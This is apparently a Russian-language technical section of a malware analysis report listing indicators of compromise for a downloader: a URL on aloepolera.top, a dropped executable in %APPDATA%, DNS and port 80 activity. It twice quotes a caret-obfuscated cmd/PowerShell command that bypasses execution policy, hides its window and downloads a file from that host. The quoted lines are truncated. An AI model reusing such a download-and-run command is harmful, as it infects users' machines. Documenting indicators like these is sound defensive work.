Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowErS^hEll^.^E^X^E^ -^exEcutI^O^NPoL^i^cY b^yPA^ss^ -N^OPRo^f^ilE -win^DOw^S^T^Y^LE ^hidDe^n^ (n^Ew-OBJE^CT SYSTe^m.Ne^T^.^WE^bC^l^iE^NT).^do^Wnloa^dFIl^E('http://aloepolera....
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /c "PowErS^hEll^.^E^X^E^ -^exEcutI^O^NPoL^i^cY b^yPA^ss^ -N^OPRo^f^ilE -win^DOw^S^T^Y^LE ^hidDe^n^ (n^Ew-OBJE^CT SYSTe^m.Ne^T^.^WE^bC^l^iE^NT).^do^Wnloa^dFIl^E('http://aloepolera....' (со скрытым окном)